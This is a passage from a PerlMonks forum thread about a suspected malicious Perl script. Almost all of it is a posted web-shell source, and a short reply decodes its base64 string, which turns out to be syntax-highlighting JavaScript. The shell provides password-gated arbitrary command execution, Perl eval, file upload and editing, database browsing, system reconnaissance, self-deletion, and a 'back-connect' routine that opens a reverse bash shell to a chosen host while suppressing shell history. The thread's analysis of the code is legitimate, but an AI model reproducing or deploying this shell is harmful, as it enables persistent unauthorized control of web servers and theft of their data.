++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?
+";secure":"");}setCookie("last_command","$h","","/");</script>
END
}sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/gis){$CurrentDi
+r=~s!\Q//!/!g;if(!-r $1){$RunCommand="Can't read $1!";chop($CurrentDi
+r=`$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".
+$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPa
+geHeader("c");print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$OldD
+ir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{
+&PrintPageHeader("c");&history;print "<h1>Console:</h1>$div";$Prompt 
+= $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$P
+rompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunC
+ommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($C
+ommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";
+open(CommandOutput, $Command);while(<CommandOutput>){$_=~s/(\n|\r\n)$
+//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}p
+rint "</pre>";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $pa
+th=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCo
+mmand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand 
+eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makef
+ile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$Run
+Command="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq
+ "unzip"){$RunCommand="tar xfz ".$UnZipArch;}elsif($RunCommand eq "de
+lfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$R
+unCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my 
+$tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunComma
+nd eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $p
+ath $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttem
+pt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ 
+//g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al
+.".".$ar;$RunCommand="touch -t $ttempt $path";}if($RunCommand=~m/^\s*
+cd\s+(.+)/){$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep
+."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeade
+r("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$OldDir> "
+ : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&Prin
+tPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?"
+$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCo
+mmand<pre>";$Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redire
+ctor;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutD
+uration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOu
+tput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_
+\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>
+";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub S
+endFileToBrowser($){open (FILE, $_[0]);local ($/);$file=<FILE>;close 
+(FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x-
+unknown\n";print "Content-Disposition: attachment;filename=".$1."\n";
+print "Content-Description: File to download\n\n";print $file;}sub Sy
+stemInfo{sub langs{$s="which gcc perl python php tar zip";$s.=" -U $q
+{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u});
+return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}su
+b perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s=
+"php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/h
+osts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which l
+ynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}su
+b httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return $s;}$l
+angs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$p
+hpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader
+("c");print "<h1>System information</h1>";print "$div$tab<td><span>HD
+D[mount]:</span>$div";P(`$hdd1`);print "$dive</td><td><span>HDD[df -h
+]:</span>$div";P(`$hdd`);print "<tr><td><span>PATHS:</span>$div";P(`$
+langs`);print "$dive</td><td><span>DOWNLOADERS:</span>$div";P(`$downl
+oaders`);print "$dive</td></tr><tr><td><span>PERL version:</span>$div
+";P(`$perlv`);print "$dive</td><td><span>PHP version:</span>$div";P(`
+$phpv`);print "$dive</td></tr><tr><td><span>/etc/hosts:</span>$div";P
+(`$hosts`);print "$dive</td><td><span>httpd.conf:</span>$div";P(`$htt
+pd`);print "$dive</td></tr>$tabe$dive";&PrintPageFooter;}sub sql_logi
+nform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{
+'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Co
+okies{'passs'};$dbb=$Cookies{'dbb'};if(!$hhost){$hhost='localhost'};i
+f(!$pport){$pport='3306'};if(!$usser){$usser='root'};print <<END;
<form name='sf' method='post'><table cellpadding='2' cellspacing='0'><
+tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password<
+/td><td>Database</td><td></td></tr><tr><td><select name='type' id='nn
+ame'><option value='mysql' selected>MySql</option><option value='pgsq
+l'>PostgreSql</option></select></td><td><input type=text name=sql_hos
+t value=$hhost></td><td><input type=text name=sql_port value=$pport><
+/td><td><input type=text name=sql_login value=$usser></td><td><input 
+type=text name=sql_pass value=$passs></td><td><input type=text name=s
+ql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDi
+r"><input type="hidden" name="a" value="sql_connect"><td><input type=
+submit value='>>'></td></tr>$tabe</form><br><script>document.getEleme
+ntById('nname').focus();</script>
END
}sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form(
+);&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'}
+;$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'
+};$dbb=$in{'sql_db'};}sub sql_query_form{ print <<END;
$tab<td><span>Current query:</span></td><td><form name='querys' method
+='post'><textarea name='query' cols=70 style='width:100%;height:60px'
+>$zapros</textarea><br/><input type=submit value='Query'><input type=
+"hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" v
+alue="sql_query"></form></td>$tabe$tabe
END
}sub sql_cq_form{print <<END;
$tab<td><span>Get data from columns:</span></td><td><form name='cquery
+s' method='post'><textarea name='cquery' id='cquery' cols=40 style='w
+idth:100%;height:60px'></textarea><br/><input type="hidden" name="a" 
+value="sql_query"><input type="hidden" name="d" value="$CurrentDir"><
+input type=submit value='Query'></form></td>
END
}sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0]
+.'><input type="hidden" name="a" value="sql_databases"><input type=hi
+dden name=database value='.$$ref[0].'><input type="hidden" name="d" v
+alue="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s
+4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.sub
+mit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>
+</form></tr>';}sub sql_tables_form {print '<tr><form method=post name
+=tt'.$$ref[0].'><input type="hidden" name="a" value="sql_tables"><inp
+ut type=hidden name=table value='.$$ref[0].'><input type="hidden" nam
+e="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1
+">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0
+].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></
+a></td></form></tr>';}sub sql_columns_form{print '<script>function lo
+l'.$s4et.'(f){if(f.checked){var cn=document.getElementById("cquery").
+value;if(cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{doc
+ument.cquerys.cquery.value=f.id;}}else{exit;}}</script><tr><form meth
+od=post name=cc'.$$ref[0].'><input type="hidden" name="a" value="sql_
+columns"><input type=hidden name=column value='.$$ref[0].'><input typ
+e="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font
+ face="Verdana" size="1">['.$s4et.']</font></td><td><input type=check
+box id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.for
+m.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].
+'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td
+></form><tr>';}sub sql_data_form {print '<tr><form method=post name=d
+t'.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><
+td>'.$verd.'['.$s4et.'] </font></td><td>'.$verd.$$ref[0].'</font></td
+></form></tr>';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPa
+geFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print <<END;
<h1>Back-connect  [perl]</h1><br/><form name='nfp' method=post>Server:
+ <input type='text' name='server' value=$rip> Port: <input type='text
+' name='ppport' value=31337><input type="hidden" name="a" value="net_
+go"><input type=submit value='>>'></form><br>
END
&PrintVar;}sub back{open(FILE,">/tmp/bbc.pl");$bbc='#!/usr/bin/perl us
+e IO::Socket;$system="/bin/bash";use Socket;use FileHandle;socket(SOC
+KET,PF_INET,SOCK_STREAM,getprotobyname("tcp")) or die print "[-] Unab
+le to Resolve Host\n";connect(SOCKET,sockaddr_in("'.$port.'",inet_ato
+n("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET
+->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(ST
+DERR,">&SOCKET");system("unset HISTFILE;unset SAVEHIST;echo PPS 3.0 b
+ackconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);syst
+em("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}sub 
+NetGo{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'}
+;NetForm();back();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeade
+r("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print <<END;
<h1>Execution PERL-code</h1><form name=pf method=post><textarea name=c
+ode class=bigarea id=PerlCode></textarea><input type="hidden" name="a
+" value="eval_code"><input type=submit value=Eval style="margin-top:5
+px">
END
}sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode=$in{'code'};
+print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}sub EditFilePat
+hForm {print <<END;
<code><br><form name=pfsd method=post>$Prompt<input type="text" name=p
+ath id=edit1_file><input type="hidden" name="a" value="edit_file_path
+"><input type="hidden" name="d" value="$CurrentDir"><input type=submi
+t value=MakeDir></form></code>
END
}sub EditFilePath{$fpath="";$fpath=$CurrentDir."/".$ViewF;EditFilePrin
+t();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPag
+eFooter;}sub EditFileForm{open(FILE, $fpath);@file=<FILE>;$fccodde=Ht
+mlSpecialChars(join('', @file));print '<h1>File tools:</h1>';&RTP_EDI
+T;print <<END;
<div class=content><form name=pf11 method=post><textarea name=ccode cl
+ass=bigarea id=editfile>$fccodde</textarea><input type="hidden" name=
+"a" value="edit_file"><input type=hidden name=path value=$fpath><inpu
+t type="hidden" name="d" value="$CurrentDir"><input type=submit value
+=Save style="margin-top:5px"></form></div>
END
&PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF
+;&PrintPageHeader("c");open(FILE,$fpath);@file=<FILE>;$fccodde=join('
+',@file);$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</
+h1>';&RTP_EDIT;print decode_base64("PHNjcmlwdD5mdW5jdGlvbiBjb2xvcihjb
+2RlKXt2YXIgcz1bXTt2YXIgYz0iJyI7cmV0dXJuIGNvZGUucmVwbGFjZSgvXGIoY2FzZX
+xjYXRjaHxjb250aW51ZXxkb3xlbmRkb3xlbHNlfGVsaWZ8ZWxzZWlmfGlmZGVmfGlmbmR
+lZnxlbmRpZnxmb3J8Zm9yZWFjaHxpZnxmaXxzd2l0Y2h8dHJ5fHR5cGVvZnx3aGlsZXx3
+aXRofGJyZWFrfGluY2x1ZGV8cmVxdWlyZXxyZXF1aXJlX29uY2V8Zm9wZW58ZnB1dHN8Z
+nJlYWR8ZmlsZV9nZXRfY29udGVudHN8ZmlsZV9wdXRfY29udGVudHN8cHJlZ19yZXBsYW
+NlfGltcG9ydHxleGNlcHR8ZGVmaW5lfGRlZmluZWR8dW5kZWYpXGIvZ2ltLCc8c3Bhbj4
+kMTwvc3Bhbj4nKS5yZXBsYWNlKC8oe3x9KS9naW0sJzxzcGFuPiQxPC9zcGFuPicpLnJl
+cGxhY2UoL1xiKGZ1bmN0aW9ufHN1YnxkZWZ8dm9pZHxpbnR8cmV0dXJufGV2YWx8YXNzZ
+XJ0fGV4ZWNsfGV4ZWN2fGV4ZWN2ZXxleGVjfGV4ZWNwfGRpZVwoXCkpXGIvZ2ltLCc8Yj
+48Zm9udCBjb2xvcj0jMDBmZmZmPiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYihzdHJ
+1Y3R8ZXhpdHxjbGFzc3xzeXN0ZW18cHJpbnR8cHJpbnRmfGVjaG98c3ByaW50ZnxmcHJp
+bnRmfHZhclxzKVxiL2dpbSwnPGI+JDE8L2I+JykucmVwbGFjZSgvXGIoMHhbXGRhLXpdK
+3xcZCspXGIvZ2ltLCAnPGZvbnQgY29sb3I9I2ZmYTA3YT4kMTwvZm9udD4nKS5yZXBsYW
+NlKC8oXFx4W1xkYS16XSopL2dpbSwgJzxmb250IGNvbG9yPSNmZmEwN2E+JDE8L2ZvbnQ
++JykucmVwbGFjZSgvXGIoaHR0cFw6XC9cLypcLz98aHR0cHNcOlwvXC8qXC8/fGZ0cFw6
+XC9cLypcLz8pXGIvZ2ltLCc8dT48Zm9udCBjb2xvcj0jZmFmYWQyPiQxPC91PjwvZm9ud
+D4nKS5yZXBsYWNlKC8oIi4qPyJ8Jy4qPycpL2csJzxmb250IGNvbG9yPSNmYWZhZDI+JD
+E8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCouKlwqXC98XC9cLy4qKS9naW0sJzxmb250IGN
+vbG9yPSM2OTY5Njk+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCpbXHNcU10qP1wqXC8p
+L2dpbSwnPGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXiMuK
+iQpL2dpbSwnPGI+PGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD48L2I+JykucmVwbG
+FjZSgvKFwkW19hLXowLTldKikvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jOThmYjk4PiQxPC9
+mb250PjwvYj4nKS5yZXBsYWNlKC88cihcZCspPi9naW0sZnVuY3Rpb24obWF0Y2gsaWQp
+e3ZhciByPXNbaWQtMV07dmFyIGNzcz1yLm1hdGNoKC9eKFwvXC98XC9cKnwtKS8pPydjb
+21tZW50JzpyLm1hdGNoKC9eWyYnXS8pPydzdHJpbmcnOidyZWdleHAnO3JldHVybiAnPH
+NwYW4gY2xhc3M9IicrY3NzKyciPicrcisnPC9zcGFuPic7fSl9O2Z1bmN0aW9uIGNoYW5
+nZVRleHQoKXt2YXIgYT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2Njb2RlZScpLmlu
+bmVySFRNTDthPWNvbG9yKGEpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjY2NvZGVlJ
+ykuaW5uZXJIVE1MPWE7fTwvc2NyaXB0Pg==");
print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></d
+iv>";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c");
+$fccode=$in{'ccode'};$ffpath=$in{"path"};print <<END;
<h1>File: $ffpath saved</h1><form name=pf11 method=post><textarea name
+=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidde
+n" name="a" value="filemanager"><niput type=hidden name=path value=$f
+fpath><input type="hidden" name="ddd" value="$ViewF"><input type="hid
+den" name="d" value="$CurrentDir"><input type=submit value=Files styl
+e="margin-top:5px"></form>
END
open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF)
+;&PrintVar;&PrintPageFooter;}sub jquery{print '<script>document.query
+s.query.value="'.$zapros.'";</script>';}sub sql_columns{&GetCookies;$
+hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'uss
+er'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'t
+able'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$
+in{'column'};print <<END;
<script>function setCookie(name,value,expires,path,domain,secure){docu
+ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")
++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?
+";secure":"");}setCookie("column","$column","","/");</script>
END
print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us
+ser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print 
+"<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1
+>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}
+$rc=$sth->finish;print "$tabe</td><td>$tab<td>";$zapros="SHOW TABLES 
+FROM $dbb";sql_cq_form();print "</td><td>";sql_query_form();print "$t
+abe</td>$tabe";$s4et=0;$sth=$dbh->prepare($zapros);$sth->execute;prin
+t $tabe;print "<b>Tables from $dbb:</b><br><table border=1 cellspacin
+g=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpaddin
+g=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_f
+orm();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspac
+ing=0 cellpadding=1 cols=2>";$s4et=0;$sth=$dbh->prepare("show columns
+ from $table from $dbb");$sth->execute;while($ref=$sth->fetchrow_arra
+yref){$s4et++;sql_columns_form();}$rc=$sth->finish;print "$tabe</td>"
+;$s4et=0;$zapros="SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0
+,30";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "<td><t
+able border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->f
+etchrow_arrayref){$s4et++;sql_data_form();}$rc=$sth->finish;$rc=$dbh-
+>disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_tables{
+&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=
+$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&Prin
+tPageHeader("c");sql_vars_set();sql_loginform();$qqquery=$in{'table'}
+;print <<END;
<script>function setCookie(name,value,expires,path,domain,secure){docu
+ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")
++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?
+";secure":"");}setCookie("table","$qqquery","","/");</script>
END
print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us
+ser,$passs);$sth=$dbh->prepare('SHOW DATABASES');$sth->execute;print 
+"<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1
+>";jquery();while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases
+_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";sql_cq_form(
+);print "</td><td>";sql_query_form();print "</td>$tabe</td>$tabe";$s4
+et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print 
+"<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpaddin
+g=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";w
+hile($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$st
+h->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadd
+ing=1 cols=2>";$s4et=0;$zapros="SHOW COLUMNS FROM `$qqquery` FROM `$d
+bb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;while($ref=$s
+th->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$
+rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql
+_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_lo
+ginform();$ddb=$in{'database'};print <<END;
<script>function setCookie(name,value,expires,path,domain,secure){docu
+ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")
++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?
+";secure":"");}setCookie("dbb","$ddb","","/");</script>
END
print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us
+ser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;prin
+t "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding
+=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form()
+;}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print
+ "$tabe</td>$tabe";$s4et=0;$zapros="SHOW TABLES FROM `$ddb`";jquery()
+;$sth=$dbh->prepare($zapros);$sth->execute;print "$tabe";print "<b>Ta
+bles from $ddb:</b><br>";print "<table border=1 cellspacing=0 cellpad
+ding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tabl
+es_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe
+";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: h
+host=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie
+: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Coo
+kie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$C
+ookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$pa
+sss=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&
+PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cque
+ry'};if($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.
+`$table` LIMIT 0,30";}else{$qquery=$in{'query'};}$dbh=DBI->connect("D
+BI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW 
+DATABASES");$sth->execute;print "$verd<table width=100% cellspacing=0
+ cellpadding=1 cols=2><b>DATABASES:</b><td><table border=1 cellspacin
+g=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_d
+atabases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_que
+ry_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($qquery)
+;$sth->execute;print "<b>Results:</b><br>";print "<table border=1 cel
+lspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref
+){$s4et++;print "<tr><td>$verd [$s4et]</font></td><td>".$verd.$$ref[0
+]."</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;
+print "$tabe";print '<script>document.querys.query.value="'.$qquery.'
+";</script>';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set
+();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_se
+t();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",
+$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros="SHOW
+ DATABASES";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print 
+"$verd $tbb<b>DATABASES:</b><td><table border=1 cellspacing=0 cellpad
+ding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_fo
+rm();}$rc=$sth->finish;print "$tabe</td><td>";sql_query_form();print 
+"</td>$tabe";$rc = $dbh->disconnect;print '</font>';return;}print "So
+me error...</font>";&PrintVar;&PrintPageFooter;}sub UploadFile{if($Tr
+ansferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLi
+neInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageH
+eader("c");file_header();print "<font size=1>Uploading $TransferFile 
+to $CurrentDir...<br>";chop($TargetName) if($TargetName = $CurrentDir
+) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathS
+ep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, "
+>$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'f
+iledata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<
+br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";
+}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub Rem
+ove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm $path");}&R
+eadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=
+$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$Run
+Command2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCom
+mand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$RunCo
+mmand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s
+/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($Ru
+nCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar 
+xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne 
+'..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunComma
+nd2 eq "delete"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}
+}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile=
+$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$Del
+File=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$
+in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'m
+f'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action
+="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDi
+r=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq 
+$Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($
+Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}els
+if($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&E
+xecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($
+Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile
+;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$Tr
+ansferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Actio
+n eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;
+}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo
+;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_
+connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "
+remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Act
+ion eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databas
+es"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsi
+f($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){
+&PerformLogout;}
[download]
Comment on Re^2: Malicious Perl Scripts & Web Development Download Code
Replies are listed 'Best First'.
Re^3: Malicious Perl Scripts & Web Development by Lotus1 (Vicar) on Apr 12, 2019 at 20:35 UTC
Interesting. I'll let the Monks who are more experienced with web development comment overall but I noticed the `print decode_base64("PHNj....` and decided to try to decode it. It is some JavaScript(?) that has been encoded. It seems to just be doing keyword color highlighting for some program code. I first used a webpage to decode it and then the following script. Read more... (4 kB) The result is: Read more... (3 kB) I reformatted it slightly to try to make sense of it but I don't have the time or patience to take this any further. Good luck. Read more... (3 kB)	[reply] [d/l] [select]
Replies are listed 'Best First'.
Re^3: Malicious Perl Scripts & Web Development
by Lotus1 (Vicar) on Apr 12, 2019 at 20:35 UTC
Interesting. I'll let the Monks who are more experienced with web development comment overall but I noticed the print decode_base64("PHNj.... and decided to try to decode it. It is some JavaScript(?) that has been encoded. It seems to just be doing keyword color highlighting for some program code. I first used a webpage to decode it and then the following script.